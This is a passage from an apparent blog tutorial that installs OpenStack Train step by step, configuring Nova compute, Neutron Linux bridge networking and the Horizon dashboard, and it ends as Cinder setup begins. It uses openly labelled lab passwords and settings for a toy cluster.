project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack
</code></pre></div></div>
<p>Only a few small changes left now. Let’s configure the VNC proxy and glance:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[vnc]
enabled = true
server_listen = $my_ip
server_proxyclient_address = $my_ip
[glance]
api_servers = http://controller:9292
[oslo_concurrency]
lock_path = /var/lib/nova/tmp
</code></pre></div></div>
<p>Finally, we can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "nova-manage api_db sync" nova
# su -s /bin/sh -c "nova-manage cell_v2 map_cell0" nova
# su -s /bin/sh -c "nova-manage cell_v2 create_cell --name=cell1 --verbose" nova
95c6eb23-8e22-43d0-b833-2c9c1758f4a6
# su -s /bin/sh -c "nova-manage db sync" nova
</code></pre></div></div>
<p>We can check that the two nova cells, cell0 and cell1, are registered:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># su -s /bin/sh -c "nova-manage cell_v2 list_cells" nova
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
| Name | UUID | Transport URL | Database Connection | Disabled |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
| cell0 | 00000000-0000-0000-0000-000000000000 | none:/ | mysql+pymysql://nova:****@controller/nova_cell0 | False |
| cell1 | 95c6eb23-8e22-43d0-b833-2c9c1758f4a6 | rabbit://openstack:****@controller:5672/ | mysql+pymysql://nova:****@controller/nova | False |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
</code></pre></div></div>
<p>If everything went smoothly, we can finalise the install by restarting all the
nova services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
$ sudo systemctl restart nova-scheduler
$ sudo systemctl restart nova-conductor
$ sudo systemctl restart nova-novncproxy
</code></pre></div></div>
<h3 id="installing-nova-to-the-compute-host">Installing Nova to the Compute Host</h3>
<p>Now we have Nova all set up on the controller, we need to get things running on
the compute host.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/nova/train/install/compute-install-ubuntu.html">Nova Compute Documentation</a>.</p>
<p>We can install the nova-compute package with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install nova-compute
</code></pre></div></div>
<p>After that, we will need to edit the nova configuration file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
</code></pre></div></div>
<p>In the <code class="language-plaintext highlighter-rouge">[DEFAULT]</code> section, add rabbitmq creds as well as some other options
for Neutron networking:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
transport_url = rabbit://openstack:password123@controller
my_ip = 10.0.0.21
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver
</code></pre></div></div>
<p>Let’s set up Keystone authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>While we are at it, Placement authentication:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[placement]
region_name = RegionOne
project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack
</code></pre></div></div>
<p>Next we can configure Glance, and the lockfile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[glance]
api_servers = http://controller:9292
[oslo_concurrency]
lock_path = /var/lib/nova/tmp
</code></pre></div></div>
<p>Finally, we need to configure the VNC proxy:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[vnc]
enabled = true
server_listen = 0.0.0.0
server_proxyclient_address = $my_ip
novncproxy_base_url = http://controller:6080/vnc_auto.html
</code></pre></div></div>
<p>To run virtual machines efficiently, we need to determine whether the compute
host supports the virtualisation extensions shipped in modern processors.</p>
<p>If you run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ egrep -c '(vmx|svm)' /proc/cpuinfo
1
</code></pre></div></div>
<p>You can see if the compute host supports these extensions. Mine returns 1, which
means I am either lucky or I have a bug, but anyway, my compute machine supports
hardware acceleration. If you get value of zero, you will need to add the
following to <code class="language-plaintext highlighter-rouge">/etc/nova/nova-compute.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova-compute.conf
[libvirt]
virt_type = qemu
</code></pre></div></div>
<p>I’m not doing this on my install, since my compute machine supports vmx.</p>
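<p>Another quick way to check that hardware acceleration will actually be used
is to confirm the kvm device exists and the kernel modules are loaded. These
are just sanity checks, not required steps:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ls -l /dev/kvm
$ lsmod | grep kvm
</code></pre></div></div>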
<p>When we are all done, we can finalise the install by restarting the nova-compute
service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-compute
</code></pre></div></div>
<h3 id="discovering-the-compute-node-and-adding-it-to-the-controller">Discovering the Compute Node and Adding it to the Controller</h3>
<p>We are nearly done installing Nova, I promise. We need to go back to the
controller and discover the newly created compute host.</p>
<p>We need to be an admin for these tasks, so source the creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
</code></pre></div></div>
<p>We can ensure we can see the compute host and its nova-compute service by running:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack compute service list
+----+----------------+------------+----------+---------+-------+----------------------------+
| ID | Binary | Host | Zone | Status | State | Updated At |
+----+----------------+------------+----------+---------+-------+----------------------------+
| 3 | nova-scheduler | controller | internal | enabled | up | 2020-01-28T00:22:25.000000 |
| 4 | nova-conductor | controller | internal | enabled | up | 2020-01-28T00:22:30.000000 |
| 5 | nova-compute | compute | nova | enabled | up | 2020-01-28T00:22:32.000000 |
+----+----------------+------------+----------+---------+-------+----------------------------+
</code></pre></div></div>
<p>We see the compute host, next to the controller host. Great. Let’s enlist this
nova-compute service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># su -s /bin/sh -c "nova-manage cell_v2 discover_hosts --verbose" nova
Found 2 cell mappings.
Skipping cell0 since it does not contain hosts.
Getting computes from cell 'cell1': 95c6eb23-8e22-43d0-b833-2c9c1758f4a6
Checking host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Creating host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Found 1 unmapped computes in cell: 95c6eb23-8e22-43d0-b833-2c9c1758f4a6
</code></pre></div></div>
<p>Each time we want to add a compute host, we need to run the above command.</p>
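<p>If running that command for every new compute host gets tedious, nova can do
it on a timer instead. Setting the following in
<code class="language-plaintext highlighter-rouge">/etc/nova/nova.conf</code> on
the controller makes the scheduler look for unmapped hosts every 300 seconds.
This is optional, and I’m leaving it out of my install:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[scheduler]
discover_hosts_in_cells_interval = 300
</code></pre></div></div>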
<p>We can also see a list of all currently installed and configured services by
querying the catalogue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack catalog list
+-----------+-----------+-----------------------------------------+
| Name | Type | Endpoints |
+-----------+-----------+-----------------------------------------+
| glance | image | RegionOne |
| | | public: http://controller:9292 |
| | | RegionOne |
| | | admin: http://controller:9292 |
| | | RegionOne |
| | | internal: http://controller:9292 |
| | | |
| nova | compute | RegionOne |
| | | internal: http://controller:8774/v2.1 |
| | | RegionOne |
| | | admin: http://controller:8774/v2.1 |
| | | RegionOne |
| | | public: http://controller:8774/v2.1 |
| | | |
| placement | placement | RegionOne |
| | | internal: http://controller:8778 |
| | | RegionOne |
| | | public: http://controller:8778 |
| | | RegionOne |
| | | admin: http://controller:8778 |
| | | |
| keystone | identity | RegionOne |
| | | public: http://controller:5000/v3/ |
| | | RegionOne |
| | | internal: http://controller:5000/v3/ |
| | | RegionOne |
| | | admin: http://controller:5000/v3/ |
| | | |
+-----------+-----------+-----------------------------------------+
</code></pre></div></div>
<p>We currently have keystone, glance, placement and nova configured, and we can see
their endpoints.</p>
<h2 id="installing-neutron-the-networking-service">Installing Neutron, the Networking Service</h2>
<p>Neutron is the networking service for OpenStack. Neutron leverages built in
Linux networking functions through plugins and sub-services to provide virtual
networking to instances created by Nova.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/neutron/train/install/install-ubuntu.html">Installation Documentation for Ubuntu</a>.</p>
<h3 id="setting-up-the-database-and-service-accounts">Setting up the Database and Service Accounts</h3>
<p>For each OpenStack service we set up, we have to create a database, grant
privileges, and create service accounts. Neutron is no different. Head to the
controller node, and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE neutron;
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>This makes the Neutron database. Let’s set up privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'%' \
IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>From there, let’s create the neutron user and set up the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt neutron
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | ab6782079b3146eaa05d37e65e23cb43 |
| name | neutron |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user neutron admin
</code></pre></div></div>
<p>Let’s set up the service and the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name neutron --description "OpenStack Networking" network
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Networking |
| enabled | True |
| id | 791b51052a5546a18f34b0d88b1ad55f |
| name | neutron |
| type | network |
+-------------+----------------------------------+
</code></pre></div></div>
<p>For the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne network public http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 02eaa3bda2c14776b78c219869e21c9f |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network internal http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 3b676e8beaaa4a5cbf90a4fc2fe4690f |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network admin http://controller:9696
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | dcd64f08a346410aa1af89fdd3405406 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron |
| service_type | network |
| url | http://controller:9696 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-neutron-to-the-controller">Installing Neutron to the Controller</h3>
<p>Let’s get some packages installed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install neutron-server neutron-plugin-ml2 neutron-linuxbridge-agent \
neutron-dhcp-agent neutron-metadata-agent
</code></pre></div></div>
<p>Once everything is installed, we can edit the Neutron configuration file to
add database creds and change some basic settings.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite
connection = mysql+pymysql://neutron:password123@controller/neutron
</code></pre></div></div>
<p>Add the rabbitmq settings, and we also need to define the authentication
scheme:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
core_plugin = ml2
service_plugins =
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
</code></pre></div></div>
<p>From there, we need to set up Keystone accounts:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<p>As always, make sure to use the correct password for the neutron account.</p>
<p>Since we will be using Neutron with Nova, we will configure Neutron to notify
Nova on any port status or configuration changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[DEFAULT]
# ...
notify_nova_on_port_status_changes = true
notify_nova_on_port_data_changes = true
</code></pre></div></div>
<p>Now, let’s add the Nova account information in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[nova]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = nova
password = openstack
</code></pre></div></div>
<p>We also need to set a lockfile path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/neutron/tmp
</code></pre></div></div>
<h4 id="configuring-the-ml2-networking-plugin">Configuring the ML2 Networking Plugin</h4>
<p>Our deployment will use the Modular Layer 2 (ML2) plugin with the Linux bridge
mechanism, which uses the kernel’s built-in bridging to provide layer 2
devices, such as bridges and switches, in the virtual network for instances.</p>
<p>Let’s edit some configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/plugins/ml2/ml2_conf.ini
[ml2]
type_drivers = flat,vlan
tenant_network_types =
mechanism_drivers = linuxbridge
extension_drivers = port_security
[ml2_type_flat]
flat_networks = provider
[securitygroup]
enable_ipset = true
</code></pre></div></div>
<p>This sets things up such that the provider network is a flat network provided by
Linux bridges, and tenants cannot create their own networks.</p>
<h4 id="configuring-the-linux-bridge-agent">Configuring the Linux Bridge Agent</h4>
<p>When configuring the Linux bridge agent, we need to know what interface our
provider network is on. So go back to <code class="language-plaintext highlighter-rouge">/etc/netplan/50-cloud-init.yaml</code>, and
we can see that our provider network is <code class="language-plaintext highlighter-rouge">enp3s0</code>, since it has the <code class="language-plaintext highlighter-rouge">203.0.113.11</code>
IP address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enp3s0:
dhcp4: true
addresses: [203.0.113.11/24]
</code></pre></div></div>
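<p>If your netplan file is less obvious than mine, you can also just ask the
kernel which interface holds the provider address. A quick way, using the brief
output mode of <code class="language-plaintext highlighter-rouge">ip</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ip -br addr | grep 203.0.113
</code></pre></div></div>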
<p>Great. From there, lets configure the bridge agent:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[linux_bridge]
physical_interface_mappings = provider:enp3s0
[vxlan]
enable_vxlan = false
[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver
</code></pre></div></div>
<p>We also need to check that the <code class="language-plaintext highlighter-rouge">br_netfilter</code> kernel module is loaded, since it
is what lets netfilter, and therefore our security groups, filter bridged
traffic:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsmod | grep br_netfilter
br_netfilter 28672 0
bridge 176128 1 br_netfilter
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">br_netfilter</code> is already loaded for me.</p>
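<p>If it isn’t loaded on your machine, you can load it by hand and make it
persist across reboots, with something like:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo modprobe br_netfilter
$ echo br_netfilter | sudo tee /etc/modules-load.d/br_netfilter.conf
</code></pre></div></div>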
<p>We also need to make sure the following sysctl values are set to 1, which they
should be by default on any Ubuntu release:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sysctl net.bridge.bridge-nf-call-iptables
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1
</code></pre></div></div>
<h4 id="configuring-the-dhcp-agent">Configuring the DHCP Agent</h4>
<p>We want our virtual network to provide a DHCP lease to our instances, so we
need to configure the DHCP agent:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/dhcp_agent.ini
[DEFAULT]
interface_driver = linuxbridge
dhcp_driver = neutron.agent.linux.dhcp.Dnsmasq
enable_isolated_metadata = true
</code></pre></div></div>
<h4 id="configuring-the-metadata-agent">Configuring the Metadata Agent</h4>
<p>The metadata agent is quite an important agent - it provides run time
configuration information to instances, things that can be consumed by services
like <code class="language-plaintext highlighter-rouge">cloud-init</code>, such as SSH keys and autostart scripts.</p>
<p>The metadata agent requires a shared secret, so we can generate one with openssl:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openssl rand -hex 10
9de15dd7b515ab242d20
</code></pre></div></div>
<p>This generates us a 10 byte long random secret, which we can use in our
configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/metadata_agent.ini
[DEFAULT]
nova_metadata_host = controller
metadata_proxy_shared_secret = 9de15dd7b515ab242d20
</code></pre></div></div>
<h4 id="configure-nova-to-use-neutron-for-networking">Configure Nova to use Neutron for Networking</h4>
<p>Time to add some creds to Nova so it can communicate with Neutron:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack
service_metadata_proxy = true
metadata_proxy_shared_secret = 9de15dd7b515ab242d20
</code></pre></div></div>
<h4 id="finalise-by-populating-database-and-restarting-services">Finalise by Populating Database and Restarting Services</h4>
<p>We can populate the database on the controller with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "neutron-db-manage --config-file /etc/neutron/neutron.conf \
--config-file /etc/neutron/plugins/ml2/ml2_conf.ini upgrade head" neutron
</code></pre></div></div>
<p>Restart the Nova service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
</code></pre></div></div>
<p>Restart the Neutron services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart neutron-server
$ sudo systemctl restart neutron-linuxbridge-agent
$ sudo systemctl restart neutron-dhcp-agent
$ sudo systemctl restart neutron-metadata-agent
</code></pre></div></div>
<h3 id="installing-neutron-to-the-compute-machine">Installing Neutron to the Compute Machine</h3>
<p>Most of the heavy lifting when installing Neutron was setting up the
controller; like nova-compute, installing neutron on the compute machine is
straightforward.</p>
<p>Let’s install the package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install neutron-linuxbridge-agent
</code></pre></div></div>
<p>And start some configuration. Note, we need to comment out the database section
since compute nodes do not directly connect to the Neutron database.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite
[DEFAULT]
core_plugin = ml2
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
</code></pre></div></div>
<p>Let’s set up Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<p>And configure the lock path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/neutron/tmp
</code></pre></div></div>
<h4 id="configure-the-linux-bridge-agent-in-the-compute-machine">Configure the Linux Bridge Agent in the Compute Machine</h4>
<p>Similar to the controller, we need to tell Neutron the network interface we
are using. Again, check <code class="language-plaintext highlighter-rouge">/etc/netplan/50-cloud-init.yaml</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enp3s0:
dhcp4: true
addresses: [203.0.113.21/24]
</code></pre></div></div>
<p>Mine says <code class="language-plaintext highlighter-rouge">enp3s0</code> like last time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[linux_bridge]
physical_interface_mappings = provider:enp3s0
[vxlan]
enable_vxlan = false
[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver
</code></pre></div></div>
<p>Again, we need to ensure the <code class="language-plaintext highlighter-rouge">br_netfilter</code> module is loaded:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsmod | grep "br_netfilter"
br_netfilter 28672 0
bridge 176128 1 br_netfilter
</code></pre></div></div>
<p>And that the following sysctl entries are set to 1:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sysctl net.bridge.bridge-nf-call-iptables
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1
</code></pre></div></div>
<h4 id="configure-nova-to-use-neutron-for-networking-on-the-compute-machine">Configure Nova to use Neutron for Networking on the Compute Machine</h4>
<p>Some quick config to link Nova up with Neutron:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack
</code></pre></div></div>
<h4 id="restart-services">Restart Services</h4>
<p>We need to restart both the Nova and Neutron services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-compute
$ sudo systemctl restart neutron-linuxbridge-agent
</code></pre></div></div>
<h3 id="verifying-that-neutron-was-installed-successfully">Verifying that Neutron was Installed Successfully</h3>
<p>We can do a quick check of the status of the Neutron services. Head back
to the controller, and source the admin creds. From there, run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack network agent list
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| ID | Agent Type | Host | Availability Zone | Alive | State | Binary |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| 64f8361f-8948-4eec-9950-bf825923f250 | Metadata agent | controller | None | :-) | UP | neutron-metadata-agent |
| 898b76b2-da96-4ae3-838e-7aaf2d20a10b | Linux bridge agent | controller | None | :-) | UP | neutron-linuxbridge-agent |
| 97e09a16-ba6a-457e-9b35-866a36b4db52 | DHCP agent | controller | nova | :-) | UP | neutron-dhcp-agent |
| e49601df-6481-4e25-aee6-58256f4eae0d | Linux bridge agent | compute | None | :-) | UP | neutron-linuxbridge-agent |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
</code></pre></div></div>
<p>We can see our Neutron services listed, and alive. Great!</p>
<h2 id="installing-horizon-the-dashboard-service">Installing Horizon, the Dashboard Service</h2>
<p>When most end users interact with OpenStack, they are really interacting with
Horizon, the graphical webapp that fronts an OpenStack cluster.</p>
<p>Horizon pulls its information in from the other services, and doesn’t have its own
database or other persistence mechanism, so we can install it, configure it,
and go.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/horizon/train/install/install-ubuntu.html">Horizon Install Documentation</a>.</p>
<p>We are going to install Horizon to the controller.</p>
<p>The package is a simple <code class="language-plaintext highlighter-rouge">apt install</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install openstack-dashboard
</code></pre></div></div>
<p>From there, we can do some configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/openstack-dashboard/local_settings.py
OPENSTACK_HOST = "controller"
OPENSTACK_KEYSTONE_URL = "http://%s:5000/v3" % OPENSTACK_HOST
</code></pre></div></div>
<p>From there, we need to allow any host to connect. Note: leave the <code class="language-plaintext highlighter-rouge">ALLOWED_HOSTS</code>
entry in the <code class="language-plaintext highlighter-rouge">Ubuntu</code> section intact. Find the commented-out entry at the top of
the file, and make a new entry below it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ALLOWED_HOSTS = ['horizon.example.com', ]
ALLOWED_HOSTS = ['*', ]
</code></pre></div></div>
<p>You probably don’t want to do that for a production cluster, but we are just
making a toy cluster to learn how OpenStack works.</p>
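<p>For reference, a production deployment would instead list only the names Horizon
is actually served from, something along the lines of (hostnames here are
hypothetical):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ALLOWED_HOSTS = ['controller', '10.0.0.11']
</code></pre></div></div>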
<p>Onward to configuring memcached:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': 'controller:11211',
},
}
</code></pre></div></div>
<p>The main changes here are adding the “controller” location and setting the
<code class="language-plaintext highlighter-rouge">SESSION_ENGINE</code>.</p>
<p>Back to some more changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OPENSTACK_API_VERSIONS = {
"identity": 3,
"image": 2,
"volume": 3,
}
OPENSTACK_KEYSTONE_DEFAULT_DOMAIN = "Default"
OPENSTACK_KEYSTONE_DEFAULT_ROLE = "user"
</code></pre></div></div>
<p>Since we configured a provider network and don’t allow users to create their
own L3 network topologies, we need to disable the L3 networking services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OPENSTACK_NEUTRON_NETWORK = {
'enable_auto_allocated_network': False,
'enable_distributed_router': False,
'enable_fip_topology_check': False,
'enable_ha_router': False,
'enable_ipv6': False,
# TODO(amotoki): Drop OPENSTACK_NEUTRON_NETWORK completely from here.
# enable_quotas has the different default value here.
'enable_quotas': False,
'enable_rbac_policy': True,
'enable_router': False,
'enable_lb': False,
'enable_firewall': False,
'enable_vpn': False,
}
</code></pre></div></div>
<p>From there we have one small change to apache2:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ /etc/apache2/conf-available/openstack-dashboard.conf
WSGIApplicationGroup %{GLOBAL}
</code></pre></div></div>
<p>In my case, the line was already present and I did not need to do anything.</p>
<p>To get Horizon up and running, we just need to restart the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart apache2
</code></pre></div></div>
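<p>If you want a quick check from the terminal first, probing the login page from
any machine that can reach the controller should return an HTTP status line
rather than a connection error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -sI http://10.0.0.11/horizon | head -n 1
</code></pre></div></div>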
<p>Let’s test Horizon out. Open up a web browser, and head to:
<a href="http://10.0.0.11/horizon">http://10.0.0.11/horizon</a>. Hopefully you see:</p>
<p><img src="/assets/images/2020_006.png" alt="login" /></p>
<p>Woohoo! Now we are getting places. Do you like that branded dashboard? I do.</p>
<p>Let’s log in with the admin user, aka <code class="language-plaintext highlighter-rouge">admin</code> and <code class="language-plaintext highlighter-rouge">openstack</code>.</p>
<p><img src="/assets/images/2020_007.png" alt="horizon" /></p>
<p>Isn’t that a sight for sore eyes? Soon we will be rewarded by being able to
launch our first instance from Horizon. Only a few more services to go now.</p>
<h2 id="installing-cinder-the-block-storage-service">Installing Cinder, the Block Storage Service</h2>
<p>Cinder is OpenStack’s block storage service, and it offers persistent block
storage devices for virtual machines. It implements a simple scheduler to
determine which storage node a particular block storage request should be
fulfilled on, much like nova-scheduler.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/cinder/train/install/index-ubuntu.html">Cinder Install Documentation</a>.</p>
<h3 id="setting-up-cinder-databases-and-services-on-the-controller">Setting Up Cinder Databases and Services on the Controller</h3>
<p>We need to establish the Cinder database and create the OpenStack service
definitions on the controller.</p>
<p>Let’s make the database and grant privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
